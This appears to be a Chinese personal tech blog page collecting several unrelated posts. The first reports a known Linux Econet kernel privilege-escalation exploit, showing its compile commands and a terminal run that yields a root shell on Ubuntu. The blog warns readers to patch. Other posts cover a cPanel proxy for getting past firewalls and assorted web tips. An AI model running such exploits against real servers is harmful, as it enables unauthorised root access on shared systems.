——————————————-这是手痒的分割线——————————————-

系统安全高手 Dan Rosenberg 发布了一段 C 程序，这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞，可以导致本地帐号对系统进行拒绝服务或特权提升，也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell，以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过：

$ uname -r
2.6.32-21-server
 
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xffffffffa0131510
 [+] Resolved econet_ops to 0xffffffffa0131600
 [+] Resolved commit_creds to 0xffffffff8108b820
 [+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
#

由于 RHEL/CentOS 默认不支持 Econet 协议，所以测试没有通过：

$ uname -r
2.6.18-194.26.1.el5
 
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.

如果在企业环境用 Ubuntu 的话可能会比较杯具了，几百个帐号里总可以找到一两个帐号被内部或外部人员通过上面这段程序拿到 root，这对服务器的危害是毁灭性的。前天还在说 Ubuntu 在内核方面无作为，现在想起来还有点后怕。VPSee 提醒正在使用多个普通帐号登录 Ubuntu VPS 的朋友及时升级或打内核补丁，出售 VPN/SSH 帐号、提供免费 SSH 的商家尤其要小心 “客户” 捣乱，使用其他 Linux 发行版的朋友也最好检查一下自己的 VPS 有没有这些高危漏洞。

——————————————-这是手痒的分割线——————————————-

21个人的测试，在Debian 5.0.6上测试，结果如下：

$ uname -r
2.6.26-2-xen-amd64
$ gcc h.c -o h
$ ./h
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xffffffffa017819b
 [+] Resolved econet_ops to 0xffffffffa01791e0
[*] Failed to resolve kernel symbols.

同时，各位提供SSH番羽墙的童鞋，只要把用户的shell设置为nologin便可以表示没有鸭梨了~

-EOF-

于是21使用GG大神经过一番搜寻，找到一个工具：cPanel Proxy。
它的工作原理就是通过Apache的Rewrite规则，将2082端口的访问重定向到一个PHP脚本上，经过试用，效果明显。

大概安装方法如下：（选自liewonheart.com。）

1. 通过Web代理登录你的cPanel；
2. 在Addon Domain（域名附加）模块为你的域名增加一个叫“cpanel”子站点绑定，目录为 /public_html/cpanel/ ；
3. 在域名所属的DNS增加这个记录并指向你的空间IP（如果域名和空间是一块儿买的，那就不需此步）；
4. 下载cPanel Proxy（感谢myplacedk写了这个脚本）。
5. 上传cPanelProxy.zip里的所有文件到你的 /public_html/cpanel/ 目录。
   （21注：或者是/www/cpanel/，也有可能是/cpanel/，根据你的实际情况而定）
6. 编辑并上传包含以下内容的.htaccess文件到你的/public_html/cpanel/目录（之前下载的文件包里也有）：

   1 2 3

   RewriteEngine on RewriteCond %{REQUEST_URI} !^/cpanelproxy.php RewriteRule .* /cpanelproxy.php [last]

   注：如果你的网络无法使用FTP工具，你可以考虑net2ftp。

7. 完成了，访问 cpanel.yourdomain.com 即可对你的cPanel进行任何动作了，嘿嘿~

以下是引用来源的原文：

From: liewonheart.com

After my hosting order has been confirmed, I cannot enter cPanel either by http://mydomain/cpanel, http://mydomain:2082/ (port 2082) or by http://ip-address/cpanel. Firefox and IE showed disappointing error messages “The connection has timed out.” and “The page cannot be displayed.” respectively.

Then I asked my web host to assist me, but they replied “cPanel of your account is loading fine here”. What?! I was baffled at first, but later I discovered that actually i was behind a strict firewall – it blocked my connection!

Okay, if you are facing the same problem, please take a look at the solutions below.

Firstly, look for a web proxy.
Proxy helps you bypass firewall. Google “web proxy” now and you will have a bundle of choices. Alternatively, you can use FoxyProxy or similar add-ons in Firefox.

However, it is quite inconvenience if everytime we need to enter web proxy page before getting into cPanel. And also, proxy might leak information about our computer – compromising our anonymity. Many proxies unknowingly reveal our browser information and referring websites. Some of them even expose our real IP address.

That’s why cPanel proxy comes in.
Load cPanel via web proxy.
Add a subdomain, called it “cpanel”.
Download cPanel proxy (Thanks to myplacedk for writing the script!)
Upload the script cpanelproxy.php to the /public_html/cpanel/ directory.
If firewall blocks your FTP tools (like File Zilla), you can use web ftp net2ftp or FireFTP in Firefox.
Modify/upload the file .htaccess /public_html/cpanel/ to include the following 3 lines:

RewriteEngine on
RewriteCond %{REQUEST_URI} !^/cpanelproxy.php
RewriteRule .* /cpanelproxy.php [last]

If Windows doesn’t allow you to rename the file as .htaccess (because file is not allowed to have no name), do it in your server.

What’s next?
That’s it! Now use cpanel.yourdomain.com to log in cPanel.

* {filter: Gray;}

或者在</body>前加入以下代码

<style>* {filter: Gray;} </style>

国务院公告

为表达全国各族人民对四川汶川大地震遇难同胞的深切哀悼,国务院决定,2008年5月19日至21日为全国哀悼日。在此期间,全国和各驻外机构下半旗志哀,停止公共娱乐活动,外交部和我国驻外使领馆设立吊唁簿。5月19日14时28分起,全国人民默哀3分钟,届时汽车、火车、舰船鸣笛，防空警报鸣响。

我这里是设置为COOKIE登陆的，不论使用任何用户名，都会提示

错误
#1045 - Access denied for user 'mysql'@'localhost' (using password: NO)

不过，值得注意的是，其中的“MYSQL”不是真正的用户，而是另外的，
搜索了一下，有些人的提示是

错误
#1045 - Access denied for user 'phpmyadmin'@'localhost' (using password: NO)

理论上应该是我猜测有可能是IIS用户名或者目录名。

目前尚未解决。

————————–我更新啦！————————–

Update: March 25th, 2008
原因是启用了PHP的Safe_Mode，关闭就可以了。

我记得有人建议修改post.php来取消Preview功能，
不过，我修改了一下代码，用一个更温和的方式提示用户，而不是强制转向，这样多少有点作用，也不会影响自己编辑POST了。

<SCRIPT LANGUAGE=”javascript”>
if (top.location != self.location)window.alert(“您目前是通过框架浏览本站，建议直接从http://mr21.in访问以获取最新讯息”);
</SCRIPT>

效果很简单，就是弹一个对话框提示访客，提示内容请自己更改。

——————————————————–
附带一个用于连接打开远程终端服务的 Windows 2000/XP/2003 的基于ActiveX的远程桌面（RemoteDesktop）连接器WEB版。
支持自定义端口。
俗称：3389
地址：

http://www.weki.cn/3389/default.htm

下载：
http://www.weki.cn/3389/3389.zip (414k)

针对最近云南地区的CNC frame事件，想了一个解决的办法，
不过只是对个人网站有帮助而已，
如果你只是浏览中被加上CNC frame，那估计还是没办法的。

说白了，就是防止被别人frame的代码，
如果你有个人网站，并且不希望 云南的网友 访问的时候出现在一个CNC frame里面，那么，请用这个吧：

Code:

<SCRIPT LANGUAGE=javascript>
<!--
if (top.location != self.location)top.location=self.location;
-->
</SCRIPT>

Movable Type 3.2 出来以后，官方极力推荐了一款名为 StyleCatcher 的插件，
根据官方的介绍，可以知道这是一款用来管理/切换MT模板的插件。

安装很简单，把下载的StyleCatcher-1.0.zip解压以后，直接用FTP上传到MT的安装目录就行，（请注意，*NIX主机权限应为755）
后台里面默认是启用的，

在后台的Plugins管理单元，点击 StyleCatcher 就可以进入主题管理了。
点击 Find Style 就会开始寻找官方主题库（Style Libry）里面的主题，选择主题后，在右下脚的Blog列表选择一个，确定就行。

相关：
StyleCatcher 1.01: http://www.sixapart.com/pronet/code/StyleCatcher-1.01.zip
MT Styles: http://www.sixapart.com/movabletype/styles/

根据模糊的记忆，大概有几K的IP吧，不过也无所谓了，弄个站嘛，没追求这么多余的东西。

同时给每篇POST加个[English]，用来翻译文章的，Translate by Google.
顺便修改了一下时间的显示格式，表现得跟我的日记一致。

最近估计要生篇POST骂一下Super Girl/Sound了.. .. ..像MM的都完了，剩下的.. .. ..SIGH!

您现在使用的是IE浏览器，这似乎不是一个很好的选择。我们建议您使用更快速、安全的Firefox浏览器浏览本站。

正确使用CCL标示：

http://creativecommons.org/license/

选项后，使用其提供的代码。

http://www.nhacks.com/email/index.php

可以生成很多种的EMAIL ICON，其中还包括了QQ.com呢！
当然，大名鼎鼎的GMAIL，HOTMAIL都在呢，至于怎么需要呢，大家自己去弄喽，填进自己的邮箱用户名，然后选择后缀，点Generate后就可以生成了，估计是用了PHP中GD库的支持，不过也不错啦~~等找一个就弄我自己这里~~

示例：（我弄了一些自己的邮箱）

大家自己实验吧~~~

主体代码：

TD菜单部分代码：
默认显示菜单：

控制部分：


状态显示：

默认隐藏菜单：

控制部分：


状态显示：

从代码上很容易看出，这只是简单改变TD的display状态而实现实时的显示/隐藏表格菜单，
不过有个缺陷，就是代码只应用于表格效果最好，至于IMG也行，但是单纯的文字就不可能了，怎么说也要有个控制层。

恩，演示可以查看我在BLOGCN的BLOG：http://cdis.blogcn.com
有什么问题请留言。